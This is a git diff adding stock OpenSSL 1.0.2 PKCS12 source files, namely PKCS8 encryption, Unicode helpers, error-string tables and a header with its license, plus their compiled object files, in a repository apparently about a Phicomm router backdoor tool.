+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+X509_SIG *PKCS8_encrypt(int pbe_nid, const EVP_CIPHER *cipher,
+                        const char *pass, int passlen,
+                        unsigned char *salt, int saltlen, int iter,
+                        PKCS8_PRIV_KEY_INFO *p8inf)
+{
+    X509_SIG *p8 = NULL;
+    X509_ALGOR *pbe;
+
+    if (!(p8 = X509_SIG_new())) {
+        PKCS12err(PKCS12_F_PKCS8_ENCRYPT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (pbe_nid == -1)
+        pbe = PKCS5_pbe2_set(cipher, iter, salt, saltlen);
+    else if (EVP_PBE_find(EVP_PBE_TYPE_PRF, pbe_nid, NULL, NULL, 0))
+        pbe = PKCS5_pbe2_set_iv(cipher, iter, salt, saltlen, NULL, pbe_nid);
+    else {
+        ERR_clear_error();
+        pbe = PKCS5_pbe_set(pbe_nid, iter, salt, saltlen);
+    }
+    if (!pbe) {
+        PKCS12err(PKCS12_F_PKCS8_ENCRYPT, ERR_R_ASN1_LIB);
+        goto err;
+    }
+    X509_ALGOR_free(p8->algor);
+    p8->algor = pbe;
+    M_ASN1_OCTET_STRING_free(p8->digest);
+    p8->digest =
+        PKCS12_item_i2d_encrypt(pbe, ASN1_ITEM_rptr(PKCS8_PRIV_KEY_INFO),
+                                pass, passlen, p8inf, 1);
+    if (!p8->digest) {
+        PKCS12err(PKCS12_F_PKCS8_ENCRYPT, PKCS12_R_ENCRYPT_ERROR);
+        goto err;
+    }
+
+    return p8;
+
+ err:
+    X509_SIG_free(p8);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_p8e.o
new file mode 100644
index 0000000000000000000000000000000000000000..1aa655149909a353ea83992ee8fe6ade0dc127fb
GIT binary patch
literal 2608
zcmbu9&u`mQ9Kc`dZtWm*%i5t%LsKLol!?v6Wfk2tp*oEdn|f`Ow515jQ<8dXph+Xg
zfpy}SR1NVI#yD~tSN;Shv_)b&z=6X~+~9y1V-sT<C&Vb<ukDw(#=gK;`ucs}=Y4<q
zJ^Q_{8o7a3jBtsO7fFA{DIve_?b|bsIYai7IC(g7<WJ>gWm#q4DNASAO=WS3Jt}GJ
zp|*W*LSy5}Z0DV1ff>p8FBqk>8`{NgdqkDH@;6r%Aa}08WBbugdo0Ty80^<9`&(l_
zIL>!f$4$P)e!Gr6Iq+iFKBTZau<~#JgN{d!v-{3mV>hv8+^xAE65TzccTOjrMV%c>
z>d@k_GwVQ~T4y||vHM0Rn_N-8#Jbw0DR{c&b(T#IW4e@^?i?)O9$b4DjO$NxH-p_)
z<)7U0+czc*_T#Io%4^E1^14F5Ci&UfQ;F14rQNXGiIdXvQu?_3Lfe_j?@gwq^ogS`
zCS(vYj)Lw1&Cf590YbXS1W=T5cObC~MG`wd8ao^x8vYcTHh@3nt)0M^$cdwu2QuQs
zCxR*_E)A+;>f=3%nEr6@tT??rlot!azL+?j71N5C%7_W@%!s2IaoEcdHDKyN@?a-y
zT?qY>uy@}5?kK@|+uaOj0`Yx(zGZ<7`DT4nAmLpL&Mx--(0Uy7fUi$yuYer_#eEOT
za{$8l=?Fd-!B-;q8xj0M1pg?4e-^>Nh~V7_{(S`hIf9d>JV~3=rc@<`x!KY*H5*lH
zt7#LOHx@FAK^JnllDbG2m5iZMvNDxENlSX3Hq5u3fGOInn3J?++C*J0&_YI~XKRhM
zz#6T+Mbu)ERyWMDMNP}vwE7-Su#;FZ@(V?J)-p|^l;&kxS}f}Gc^A0d6^i;Yol{?-
z`h0GI)@&yWyg|)2>$Enx)@vWDHQTmVtJk)Z8@7Txiw_X|H}RYLYsVElXB6adP|oWJ
zL6GB>#5tZP3UU#Y^UDZ9kdJ_Jegz>2a{Mki{|X@p@+Uw!{}v$#@&llp-$n=m_X`;V
z<@_E(5cJ2phVwD}@j;Lu1m*mQk3Z?-39wNxKWa~;)>hpvSBTWIEq7e!mSt{~CEGl2
z6KSn%mx)wqwTM*Rtk=y3u*RlsN^mD0Z`tMQo8J6fqb)V9&8BJDTSRg)nCo!j<+|A`
z`G1TA1mi0PZ=@MuDE$6#XRa@|aXbu)do}~=7Y#3Xkc78?kAaOQzsV+W5#$+A<iQ)%
z_TtdTFF||^7BT04jh7)7bEZN4!t3+@fUoiTd^`mU+~z(wUI~LCzApj8TYuL#1oO|m
z_ypK~;rqu~1q^fz#&^B=b?)em!T43+VduB*eGvSd@cb~A$8#Q58%w3UhWLng$i9$x
kWWlooL<-mx$RF;|dwQ?co8w&&7XN|Q|3=T#HG=W~031tu(f|Me

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.c
new file mode 100644
index 0000000..a0b992e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.c
@@ -0,0 +1,161 @@
+/* p12_utl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/pkcs12.h>
+
+/* Cheap and nasty Unicode stuff */
+
+unsigned char *OPENSSL_asc2uni(const char *asc, int asclen,
+                               unsigned char **uni, int *unilen)
+{
+    int ulen, i;
+    unsigned char *unitmp;
+    if (asclen == -1)
+        asclen = strlen(asc);
+    ulen = asclen * 2 + 2;
+    if (!(unitmp = OPENSSL_malloc(ulen)))
+        return NULL;
+    for (i = 0; i < ulen - 2; i += 2) {
+        unitmp[i] = 0;
+        unitmp[i + 1] = asc[i >> 1];
+    }
+    /* Make result double null terminated */
+    unitmp[ulen - 2] = 0;
+    unitmp[ulen - 1] = 0;
+    if (unilen)
+        *unilen = ulen;
+    if (uni)
+        *uni = unitmp;
+    return unitmp;
+}
+
+char *OPENSSL_uni2asc(unsigned char *uni, int unilen)
+{
+    int asclen, i;
+    char *asctmp;
+    asclen = unilen / 2;
+    /* If no terminating zero allow for one */
+    if (!unilen || uni[unilen - 1])
+        asclen++;
+    uni++;
+    if (!(asctmp = OPENSSL_malloc(asclen)))
+        return NULL;
+    for (i = 0; i < unilen; i += 2)
+        asctmp[i >> 1] = uni[i];
+    asctmp[asclen - 1] = 0;
+    return asctmp;
+}
+
+int i2d_PKCS12_bio(BIO *bp, PKCS12 *p12)
+{
+    return ASN1_item_i2d_bio(ASN1_ITEM_rptr(PKCS12), bp, p12);
+}
+
+#ifndef OPENSSL_NO_FP_API
+int i2d_PKCS12_fp(FILE *fp, PKCS12 *p12)
+{
+    return ASN1_item_i2d_fp(ASN1_ITEM_rptr(PKCS12), fp, p12);
+}
+#endif
+
+PKCS12 *d2i_PKCS12_bio(BIO *bp, PKCS12 **p12)
+{
+    return ASN1_item_d2i_bio(ASN1_ITEM_rptr(PKCS12), bp, p12);
+}
+
+#ifndef OPENSSL_NO_FP_API
+PKCS12 *d2i_PKCS12_fp(FILE *fp, PKCS12 **p12)
+{
+    return ASN1_item_d2i_fp(ASN1_ITEM_rptr(PKCS12), fp, p12);
+}
+#endif
+
+PKCS12_SAFEBAG *PKCS12_x5092certbag(X509 *x509)
+{
+    return PKCS12_item_pack_safebag(x509, ASN1_ITEM_rptr(X509),
+                                    NID_x509Certificate, NID_certBag);
+}
+
+PKCS12_SAFEBAG *PKCS12_x509crl2certbag(X509_CRL *crl)
+{
+    return PKCS12_item_pack_safebag(crl, ASN1_ITEM_rptr(X509_CRL),
+                                    NID_x509Crl, NID_crlBag);
+}
+
+X509 *PKCS12_certbag2x509(PKCS12_SAFEBAG *bag)
+{
+    if (M_PKCS12_bag_type(bag) != NID_certBag)
+        return NULL;
+    if (M_PKCS12_cert_bag_type(bag) != NID_x509Certificate)
+        return NULL;
+    return ASN1_item_unpack(bag->value.bag->value.octet,
+                            ASN1_ITEM_rptr(X509));
+}
+
+X509_CRL *PKCS12_certbag2x509crl(PKCS12_SAFEBAG *bag)
+{
+    if (M_PKCS12_bag_type(bag) != NID_crlBag)
+        return NULL;
+    if (M_PKCS12_cert_bag_type(bag) != NID_x509Crl)
+        return NULL;
+    return ASN1_item_unpack(bag->value.bag->value.octet,
+                            ASN1_ITEM_rptr(X509_CRL));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/p12_utl.o
new file mode 100644
index 0000000000000000000000000000000000000000..41da8b486392e15a41f45fcfe5fb4bc57617dd6a
GIT binary patch
literal 4008
zcmbuBYitx%6vyvAkQK_f%4-qC4KZX@nCvbOsS(}j?v^PoZPRTDh-9*zE_7udWp_3y
zJ_=e(7|KRt{2*TpUrhL*epQHxMI(_!6AQu@6JsJV7-B?7<RNxFXZGIq_U?=^a+8@m
z_jmv2+;bmuW)3D(?QWNgu;L=ml9?8xgoIjVo@3Tyj7Vewx$(ftJ4&C@+hKmwr<#AK
zRr7+<JvvpdO6usjdSv4I$Lh_=+WvZ?mfz?;y%j9g+6J^wn7?1aS{<7(l*oCdR-J0S
zG_uT`JnQw7$=j-a?r3TOIg;|b)X^{8SAXu%FP=^KrwH8YWZT$f!<#hMJf@EQV0cv1
z^TMv(%8SbGFEJeR+9@|U#+dFN@4I<BZQdCB(`ZrkOXgRHUR_!zhNm{@I<4d2jaX<X
zk@FbLs@4l5OUy~-sIkZz+KMH1WWDd|FRK3A*+i&La4>5q)x55nQ)+E9&g56TVF33|
zPrV1OPQMQ~8sW6>Q^&FAgiQ}D{a@<%bJn76M*C_=9gq9e@l6ec-l~f&)R^@yb$r-o
zIgU*1vZgc31r8**IPvc;h9Xg|YUE{D*)8$-)4@<*f3;{-gRSy9IlMOVRMl!mMxtRk
zy#Db929H+p!rc$o9Jsc0_7T{@31l9)uq<j+#PxCyaSi)j%UkC9-iCv^9{38{_ZHUe
zlE3C|lLE&)2`PBkn~*}IbCOcnU6DeH6jY=@o8)hkd?AqbQoDUvZ<GAT+({{L*b|q6
zqh5E96i_T>Bd$YKyM)#l>$^7Wqz(JbhJ8ob!?Z?!mj#CNx<y$W>!jo#b?=`i`8wvu
zB_9a_3ecC;t{+XD3YvMzA9cHak8K9Py<odB+sXr;?25<Q&E_5tncED3c!<w|-`~XN
zTLe!_bMcV-njo(4L)^TqvjQv#7xsx|BLF*|0FHi`y>)hg;aNg{2Wl+roapdu=cnMn
z4+2L&e!8#BPt8G(Z#C*y3;K^7^q*7xGlKqG2mOy!-$V86yk2+E<NWRByAbR#&b;8~
z3258tH&Xp!s<+NJ_}=QE-|oQoQa|SeKV&9Z$*Fjlbaf{?)9I9!sp!#aF-Np5sjfC9
zrFFHpr<1)}uhN!EY9!vXv%9xTD`fKdl0Iz%`Y70uTy#L|em<UtG}xaj5&D=jh?4G%
zXgMQW&`^SXoOI8S&<|iBn&Umq*kcFUbAnm+$N|uyhc|><qk6V%^k?>x9ngRvSf3Tn
zP)6UURWf_BDBz6ra(=d5yeGxkQkPNmPrBN+YNh^{qQ%?*H<4-)eKViD0r-Y}wEh90
z#xFI#-FNGaVtq-WjTvPD$Irks7E%9o12^gC()~s~o-gMA5eL4`fp<7?o#V?m|F3Zz
z^EVs!9m;WDD>?pw1OJ5c!~4JJpugh4?{I$jcv?99gIqkTIKGhMn>fCh<DDE|%JD&t
zW6ogf@P-3F!|_Ksy%#qS3a%T^g9xEuH<eiJ9oBt@vpoH#z*(NgA0;fz56inBHt;lO
z`E^3zERTLKaF#Ex2%P1=y8>r<ZUtQj77xo?M6Mht7@2;kjdG(NWKZR6J|i31VS~s6
z86!jF{z`?&<q|ef9+4wN)=Py#wg{49$;is^i?z05;2YX#?=4p4p>k;ma>W5KMTglz
zZBIE<$kIUXu?m7cPEGtW$ADpJ;WrW5bQ!EZye)?d&p-?=z6{e}h8VTS{{pmSe-Z&I
zUQN092a^)UrShin*HEAT*FHkWkFo)1&BmW6a5jHd$Dkjd!-8%*jsHo3GdosyP<uf}
zUjL8t-wB5J*Cxu3P!JRxv-M|qKRjS8qWwt<Sbkx8(H_4UcKiP+UASx15ceOyC(NGh
zzunkq@)O<A0Igeqp%2j>eTsVzh}@zFdW0=BLMTF$V2-u3KZ%1ud8JWJ-$na>0B{t7
ABme*a

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.c
new file mode 100644
index 0000000..e58710b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.c
@@ -0,0 +1,149 @@
+/* crypto/pkcs12/pk12err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/pkcs12.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_PKCS12,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_PKCS12,0,reason)
+
+static ERR_STRING_DATA PKCS12_str_functs[] = {
+    {ERR_FUNC(PKCS12_F_PARSE_BAG), "PARSE_BAG"},
+    {ERR_FUNC(PKCS12_F_PARSE_BAGS), "PARSE_BAGS"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ADD_FRIENDLYNAME), "PKCS12_ADD_FRIENDLYNAME"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ADD_FRIENDLYNAME_ASC),
+     "PKCS12_add_friendlyname_asc"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ADD_FRIENDLYNAME_UNI),
+     "PKCS12_add_friendlyname_uni"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ADD_LOCALKEYID), "PKCS12_add_localkeyid"},
+    {ERR_FUNC(PKCS12_F_PKCS12_CREATE), "PKCS12_create"},
+    {ERR_FUNC(PKCS12_F_PKCS12_GEN_MAC), "PKCS12_gen_mac"},
+    {ERR_FUNC(PKCS12_F_PKCS12_INIT), "PKCS12_init"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ITEM_DECRYPT_D2I), "PKCS12_item_decrypt_d2i"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ITEM_I2D_ENCRYPT), "PKCS12_item_i2d_encrypt"},
+    {ERR_FUNC(PKCS12_F_PKCS12_ITEM_PACK_SAFEBAG), "PKCS12_item_pack_safebag"},
+    {ERR_FUNC(PKCS12_F_PKCS12_KEY_GEN_ASC), "PKCS12_key_gen_asc"},
+    {ERR_FUNC(PKCS12_F_PKCS12_KEY_GEN_UNI), "PKCS12_key_gen_uni"},
+    {ERR_FUNC(PKCS12_F_PKCS12_MAKE_KEYBAG), "PKCS12_MAKE_KEYBAG"},
+    {ERR_FUNC(PKCS12_F_PKCS12_MAKE_SHKEYBAG), "PKCS12_MAKE_SHKEYBAG"},
+    {ERR_FUNC(PKCS12_F_PKCS12_NEWPASS), "PKCS12_newpass"},
+    {ERR_FUNC(PKCS12_F_PKCS12_PACK_P7DATA), "PKCS12_pack_p7data"},
+    {ERR_FUNC(PKCS12_F_PKCS12_PACK_P7ENCDATA), "PKCS12_pack_p7encdata"},
+    {ERR_FUNC(PKCS12_F_PKCS12_PARSE), "PKCS12_parse"},
+    {ERR_FUNC(PKCS12_F_PKCS12_PBE_CRYPT), "PKCS12_pbe_crypt"},
+    {ERR_FUNC(PKCS12_F_PKCS12_PBE_KEYIVGEN), "PKCS12_PBE_keyivgen"},
+    {ERR_FUNC(PKCS12_F_PKCS12_SETUP_MAC), "PKCS12_setup_mac"},
+    {ERR_FUNC(PKCS12_F_PKCS12_SET_MAC), "PKCS12_set_mac"},
+    {ERR_FUNC(PKCS12_F_PKCS12_UNPACK_AUTHSAFES), "PKCS12_unpack_authsafes"},
+    {ERR_FUNC(PKCS12_F_PKCS12_UNPACK_P7DATA), "PKCS12_unpack_p7data"},
+    {ERR_FUNC(PKCS12_F_PKCS12_VERIFY_MAC), "PKCS12_verify_mac"},
+    {ERR_FUNC(PKCS12_F_PKCS8_ADD_KEYUSAGE), "PKCS8_add_keyusage"},
+    {ERR_FUNC(PKCS12_F_PKCS8_ENCRYPT), "PKCS8_encrypt"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA PKCS12_str_reasons[] = {
+    {ERR_REASON(PKCS12_R_CANT_PACK_STRUCTURE), "cant pack structure"},
+    {ERR_REASON(PKCS12_R_CONTENT_TYPE_NOT_DATA), "content type not data"},
+    {ERR_REASON(PKCS12_R_DECODE_ERROR), "decode error"},
+    {ERR_REASON(PKCS12_R_ENCODE_ERROR), "encode error"},
+    {ERR_REASON(PKCS12_R_ENCRYPT_ERROR), "encrypt error"},
+    {ERR_REASON(PKCS12_R_ERROR_SETTING_ENCRYPTED_DATA_TYPE),
+     "error setting encrypted data type"},
+    {ERR_REASON(PKCS12_R_INVALID_NULL_ARGUMENT), "invalid null argument"},
+    {ERR_REASON(PKCS12_R_INVALID_NULL_PKCS12_POINTER),
+     "invalid null pkcs12 pointer"},
+    {ERR_REASON(PKCS12_R_IV_GEN_ERROR), "iv gen error"},
+    {ERR_REASON(PKCS12_R_KEY_GEN_ERROR), "key gen error"},
+    {ERR_REASON(PKCS12_R_MAC_ABSENT), "mac absent"},
+    {ERR_REASON(PKCS12_R_MAC_GENERATION_ERROR), "mac generation error"},
+    {ERR_REASON(PKCS12_R_MAC_SETUP_ERROR), "mac setup error"},
+    {ERR_REASON(PKCS12_R_MAC_STRING_SET_ERROR), "mac string set error"},
+    {ERR_REASON(PKCS12_R_MAC_VERIFY_ERROR), "mac verify error"},
+    {ERR_REASON(PKCS12_R_MAC_VERIFY_FAILURE), "mac verify failure"},
+    {ERR_REASON(PKCS12_R_PARSE_ERROR), "parse error"},
+    {ERR_REASON(PKCS12_R_PKCS12_ALGOR_CIPHERINIT_ERROR),
+     "pkcs12 algor cipherinit error"},
+    {ERR_REASON(PKCS12_R_PKCS12_CIPHERFINAL_ERROR),
+     "pkcs12 cipherfinal error"},
+    {ERR_REASON(PKCS12_R_PKCS12_PBE_CRYPT_ERROR), "pkcs12 pbe crypt error"},
+    {ERR_REASON(PKCS12_R_UNKNOWN_DIGEST_ALGORITHM),
+     "unknown digest algorithm"},
+    {ERR_REASON(PKCS12_R_UNSUPPORTED_PKCS12_MODE), "unsupported pkcs12 mode"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_PKCS12_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(PKCS12_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, PKCS12_str_functs);
+        ERR_load_strings(0, PKCS12_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pk12err.o
new file mode 100644
index 0000000000000000000000000000000000000000..52be70324e7b042ac5354fcc1fd2f1e35be86818
GIT binary patch
literal 1368
zcmbtS-AV#c5T0!<`-3dH2#hegs3;F=Mbt$IVqO#xM$k>jYMX|-%I*=gi+Y6~rAH8Y
zi5|n~uA7>1&smQrBdCGdnfZ3U`8nr2W>1gD3<IPXa0G)$q5xN813%q&(=ZD&@IJTl
z@dCL_<}kK#S!_AH6+2)%ED=xcxB6l7A(dc>-Ax~c5OO1^<EXi_OTe;S!c0_>Mc;sN
zp9iBIF`~2K$tN6$@MZCjxW5VQ5Q4YQQF-Rb4QU2tNrh+z(<vajW`B!ej3N^zzJq-{
z`~yxWFf20|E+}&bJ2$Jzl<m5#1lfGPP-|E>h4YilMKV?JxO?Z6J-<#&l%tJ?wqjnV
z&aEOaO!sX?dfaYvU^f=GfE7ItSgBF3+YVw*gWC+READZtR26aAX|bl;Xxc9C0CVk{
z#q3Jq*0t)kX#NiqMK0Z;ev)ZXGdK?s>u+`yal+)g5^0c?j%IcKI{u$T{VRVPxl}WO
zs*3EtrGn_o{?hI#n3~#D1I3p-2~i(<Z9{jDvE;|lSA}*}<r)L3sq>#ilD?PDzrs9v
z)oGD0&8rx6NdQx5X->(P_^94Q>Cy+K=Np(tOEq*pVfx(><yrJ!qd*Y>2gp2nqxe0M
LSPn9MN9TV5B#clO

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pkcs12.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pkcs12.h
new file mode 100644
index 0000000..a39adf5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pkcs12/pkcs12.h
@@ -0,0 +1,342 @@
+/* pkcs12.h */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
